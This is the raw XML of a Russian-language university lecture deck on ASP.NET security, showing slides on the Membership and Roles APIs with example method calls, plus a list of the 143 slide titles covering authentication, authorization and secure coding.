            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> e-mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>адресом</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>UpdateUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>– обновить информацию текущего пользователя в базе данных.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>CreateUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>– добавить пользователя в базу данных</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>DeleteUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>– убрать пользователя из базы данных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="240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ru-RU" smtClean="0"/>
              <a:t>Примеры вызова методов</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99331" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Проверка пользователя в хранилище данных:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Membership.ValidateUser(UserNameText.Text, PasswordText.Text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Создание нового пользователя:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>MembershipCreateStatus Status;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Membership.CreateUser(UserNameText.Text,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>  PasswordText.Text,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>  UserEmailText.Text,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>  PwdQuestionText.Text,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>  PwdAnswerText.Text, true,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>  out Status);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2400"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ru-RU" smtClean="0"/>
              <a:t>Класс MembershipUser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100355" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8218488" cy="4924425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Представляет одного </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>membership </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>пользователя в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>membership </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>хранилище данных</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Основные свойства</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>UserName</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Comment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>CreationDate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>PasswordQuestion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>LastLoginDate </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Comment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>CreationDate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Основные методы:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>GetPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ChangePassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000"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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116013" y="2924175"/>
            <a:ext cx="7056437" cy="1296988"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" b="1" smtClean="0"/>
              <a:t>Интерфейс </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" smtClean="0"/>
              <a:t>Roles API</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4000" b="1"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274638"/>
            <a:ext cx="8229600" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Использование Roles API для </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Role-Based Authorization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102403" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1341438"/>
            <a:ext cx="8229600" cy="5256212"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>ASP.NET включает готовую к использованию инфраструктуру для управления и использования ролей с membership API.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Подробнее, инфраструктура ролей включает следующее:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Основанный на провайдерах расширяемый механизм для подключения разных типов хранилищ, для хранения данных о ролях.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Готовые к использованию провайдеры для SQL Server и описание необходимых таблиц, на основе БД Membership. Эти таблицы связывают описания пользователей с ролями на основе many-to-many отношений и автоматически создаются, при вызове утилиты aspnet_regsql.exe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Автоматически создается и инициализируется, для аутентифицированного с помощью модуля RoleManagerModule, объект класса RolePrincipal. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Предоставляется полный программный доступ к ролям с помощью класса Roles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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3392</TotalTime>
  <Words>10901</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Экран (4:3)</PresentationFormat>
  <Paragraphs>1225</Paragraphs>
  <Slides>143</Slides>
  <Notes>141</Notes>
  <HiddenSlides>22</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Тема</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Заголовки слайдов</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>143</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="144" baseType="lpstr">
      <vt:lpstr>Оформление по умолчанию</vt:lpstr>
      <vt:lpstr>Лекция 11</vt:lpstr>
      <vt:lpstr>Стандартные сервисы web приложений</vt:lpstr>
      <vt:lpstr>Слайд 3</vt:lpstr>
      <vt:lpstr>Безопасность в ASP.NET</vt:lpstr>
      <vt:lpstr>Authentication and Authorization</vt:lpstr>
      <vt:lpstr>Windows Authentication</vt:lpstr>
      <vt:lpstr>Forms Authentication</vt:lpstr>
      <vt:lpstr>Security ‘providers’ for common tasks</vt:lpstr>
      <vt:lpstr>Example: Login control</vt:lpstr>
      <vt:lpstr>How it works…</vt:lpstr>
      <vt:lpstr>Where’s the data?</vt:lpstr>
      <vt:lpstr>Membership controls</vt:lpstr>
      <vt:lpstr>Среда безопасности ASP.Net</vt:lpstr>
      <vt:lpstr>Оценка потенциальных угроз</vt:lpstr>
      <vt:lpstr>Советы по безопасному кодированию</vt:lpstr>
      <vt:lpstr>Слайд 16</vt:lpstr>
      <vt:lpstr>Рекомендации</vt:lpstr>
      <vt:lpstr>Межсайтовый скриптинга (XSS). </vt:lpstr>
      <vt:lpstr>Шаблон приложения  «Превратники» - «Gatekeepers» </vt:lpstr>
      <vt:lpstr>Базовые задачи безопасности</vt:lpstr>
      <vt:lpstr>Поддержка безопасности в ASP.Net</vt:lpstr>
      <vt:lpstr>Аутентификация</vt:lpstr>
      <vt:lpstr>Имперсонификация  (перевоплощение, Impersonation)</vt:lpstr>
      <vt:lpstr>Авторизация (Authorization)</vt:lpstr>
      <vt:lpstr>Конфиденциальность и целостность (confidentiality и Integrity)</vt:lpstr>
      <vt:lpstr>Порядок аутентификации пользователей</vt:lpstr>
      <vt:lpstr>Запрос web страницы, требующей аутентификации</vt:lpstr>
      <vt:lpstr>Запрос защищенной web страницы</vt:lpstr>
      <vt:lpstr>Запрос web страницы, требующей авторизации</vt:lpstr>
      <vt:lpstr>Безопасность  Internet Information Services</vt:lpstr>
      <vt:lpstr>Аутентификация в IIS 5.x и IIS 6.0</vt:lpstr>
      <vt:lpstr>Аутентификация IIS 5 и 6</vt:lpstr>
      <vt:lpstr>Методы аутентификации</vt:lpstr>
      <vt:lpstr>Слайд 34</vt:lpstr>
      <vt:lpstr>Авторизация IIS 5 и 6</vt:lpstr>
      <vt:lpstr>Сравнение IIS 5(6) и IIS 7</vt:lpstr>
      <vt:lpstr>Архитектура безопасности ASP.Net</vt:lpstr>
      <vt:lpstr>Secure Sockets Layer (SSL)</vt:lpstr>
      <vt:lpstr>ASP.Net аутентификация</vt:lpstr>
      <vt:lpstr>События безопасности</vt:lpstr>
      <vt:lpstr>ASP.Net методы аутентификации</vt:lpstr>
      <vt:lpstr>ASP.Net авторизация</vt:lpstr>
      <vt:lpstr>Авторизация и роль  (Authorization and Roles)</vt:lpstr>
      <vt:lpstr>Слайд 44</vt:lpstr>
      <vt:lpstr>Основы Forms Authentication</vt:lpstr>
      <vt:lpstr>Слайд 46</vt:lpstr>
      <vt:lpstr>Достоинства</vt:lpstr>
      <vt:lpstr>Хранение информации о пользователях</vt:lpstr>
      <vt:lpstr>Реализация Forms Autentification</vt:lpstr>
      <vt:lpstr>Конфигурирование Forms Authentification</vt:lpstr>
      <vt:lpstr>Параметры Forms Authentication</vt:lpstr>
      <vt:lpstr>Хранение учетных записей в web.config</vt:lpstr>
      <vt:lpstr>Хранение учетных записей в web.config</vt:lpstr>
      <vt:lpstr>Хранение учетных записей в web.config</vt:lpstr>
      <vt:lpstr>Хеширование паролей в web.config </vt:lpstr>
      <vt:lpstr>Сохранение хешированного пароля</vt:lpstr>
      <vt:lpstr>Отказ в доступе анонимным пользователям</vt:lpstr>
      <vt:lpstr>Отказ в авторизации незарегистрированных пользователей</vt:lpstr>
      <vt:lpstr>Правила авторизации</vt:lpstr>
      <vt:lpstr>Слайд 60</vt:lpstr>
      <vt:lpstr>Управление доступом к конкретной папке web-приложения</vt:lpstr>
      <vt:lpstr>Управление доступом к конкретным файлам</vt:lpstr>
      <vt:lpstr>Управление доступа для конкретных ролей</vt:lpstr>
      <vt:lpstr>Слайд 64</vt:lpstr>
      <vt:lpstr>IIS 7.0 и Forms Authentication</vt:lpstr>
      <vt:lpstr>Слайд 66</vt:lpstr>
      <vt:lpstr>Включение form authentication</vt:lpstr>
      <vt:lpstr>Запрет анонимного доступа</vt:lpstr>
      <vt:lpstr>  Прикладной программный интерфейс</vt:lpstr>
      <vt:lpstr>Основные классы Forms Authentication </vt:lpstr>
      <vt:lpstr>Класс FormsAuthentication </vt:lpstr>
      <vt:lpstr>Создание страницы подключения</vt:lpstr>
      <vt:lpstr>Обработка подключения пользователя</vt:lpstr>
      <vt:lpstr>Методы класса FormsAuthentication</vt:lpstr>
      <vt:lpstr>Отключение пользователя</vt:lpstr>
      <vt:lpstr>Контекст безопасности  (Security Context)</vt:lpstr>
      <vt:lpstr>Интерфейс IPrincipal</vt:lpstr>
      <vt:lpstr>Интерфейс IIdentity</vt:lpstr>
      <vt:lpstr>Свойство User в классе Page</vt:lpstr>
      <vt:lpstr>Классы Principal и Identity</vt:lpstr>
      <vt:lpstr>Проверка роли пользователя</vt:lpstr>
      <vt:lpstr>Слайд 82</vt:lpstr>
      <vt:lpstr>Слайд 83</vt:lpstr>
      <vt:lpstr>Слайд 84</vt:lpstr>
      <vt:lpstr>API для управления членством и ролями (Membership и Roles API)</vt:lpstr>
      <vt:lpstr>Основные понятия</vt:lpstr>
      <vt:lpstr>Слайд 87</vt:lpstr>
      <vt:lpstr>Учетные записи - Membership</vt:lpstr>
      <vt:lpstr>Возможности ASP.Net Membership API</vt:lpstr>
      <vt:lpstr>Архитектура Membership API</vt:lpstr>
      <vt:lpstr>Основные класс Membership API</vt:lpstr>
      <vt:lpstr>Membership провайдеры</vt:lpstr>
      <vt:lpstr>Статический класс Membership</vt:lpstr>
      <vt:lpstr>Основные методы класса Membership</vt:lpstr>
      <vt:lpstr>Слайд 95</vt:lpstr>
      <vt:lpstr>Примеры вызова методов</vt:lpstr>
      <vt:lpstr>Класс MembershipUser</vt:lpstr>
      <vt:lpstr>Слайд 98</vt:lpstr>
      <vt:lpstr>Использование Roles API для  Role-Based Authorization</vt:lpstr>
      <vt:lpstr>Подключение ролей для web приложения</vt:lpstr>
      <vt:lpstr>Слайд 101</vt:lpstr>
      <vt:lpstr>Статический класс Roles</vt:lpstr>
      <vt:lpstr>Слайд 103</vt:lpstr>
      <vt:lpstr>Слайд 104</vt:lpstr>
      <vt:lpstr>Слайд 105</vt:lpstr>
      <vt:lpstr>Создание web-сайта с управлением пользователями</vt:lpstr>
      <vt:lpstr>Использование Membership API</vt:lpstr>
      <vt:lpstr>Конфигурирование ASP.NET Membership</vt:lpstr>
      <vt:lpstr>Конфигурирование ASP.NET Membership (продолжение)</vt:lpstr>
      <vt:lpstr>Автоматическое создание хранилища данных</vt:lpstr>
      <vt:lpstr>Слайд 111</vt:lpstr>
      <vt:lpstr>Ручное создание хранилища данных</vt:lpstr>
      <vt:lpstr>Wizard интерфейс утилиты aspnet_regsql.exe</vt:lpstr>
      <vt:lpstr>Параметры утилиты aspnet_regsql.exe</vt:lpstr>
      <vt:lpstr>Конфигурирование строки соединения и провайдера</vt:lpstr>
      <vt:lpstr>Создание и аутентификация пользователей</vt:lpstr>
      <vt:lpstr>Конфигурирование учетных записей в IIS 7.0</vt:lpstr>
      <vt:lpstr>Управление пользователями непосредственно из IIS 7.0</vt:lpstr>
      <vt:lpstr>Создание пользователей с помощью программы WAT</vt:lpstr>
      <vt:lpstr>Запуск администрирования веб-узлом</vt:lpstr>
      <vt:lpstr>Слайд 121</vt:lpstr>
      <vt:lpstr>Выбор типа проверки подлинности</vt:lpstr>
      <vt:lpstr>Подключение ролей</vt:lpstr>
      <vt:lpstr>Слайд 124</vt:lpstr>
      <vt:lpstr>ЭУ для подключения к web приложению</vt:lpstr>
      <vt:lpstr>Элемент управления Login</vt:lpstr>
      <vt:lpstr>Пример описания ЭУ Login</vt:lpstr>
      <vt:lpstr>События ЭУ Login</vt:lpstr>
      <vt:lpstr>Обработка событий ЭУ Login</vt:lpstr>
      <vt:lpstr>Создание страницы Login</vt:lpstr>
      <vt:lpstr>ЭУ подключения пользователя</vt:lpstr>
      <vt:lpstr>Слайд 132</vt:lpstr>
      <vt:lpstr>Слайд 133</vt:lpstr>
      <vt:lpstr>Создание страницы регистрации новых пользователей</vt:lpstr>
      <vt:lpstr>Диалог регистрации пользователя</vt:lpstr>
      <vt:lpstr>Слайд 136</vt:lpstr>
      <vt:lpstr>Создание страницы изменения пароля пользователя</vt:lpstr>
      <vt:lpstr>Использование Membership в  Windows Forms</vt:lpstr>
      <vt:lpstr>Слайд 139</vt:lpstr>
      <vt:lpstr>Способы Windows Authentication</vt:lpstr>
      <vt:lpstr>Windows аутентификация</vt:lpstr>
      <vt:lpstr>Слайд 142</vt:lpstr>
      <vt:lpstr>Реализация Windows Authentication</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Институт Кибернетический Центр ТПУ</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <SharedDoc>false</SharedDoc>
  <HyperlinkBase>http://tpu.ru</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Security</dc:title>
  <dc:creator>Tuzovsky Anatoly Fedorovich</dc:creator>
  <dc:description>Tomsk Polytechnic University</dc:description>
  <cp:lastModifiedBy>Тузовский</cp:lastModifiedBy>
  <cp:revision>54</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-10-21T02:24:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-01-31T09:43:40Z</dcterms:modified>
</cp:coreProperties>
</file>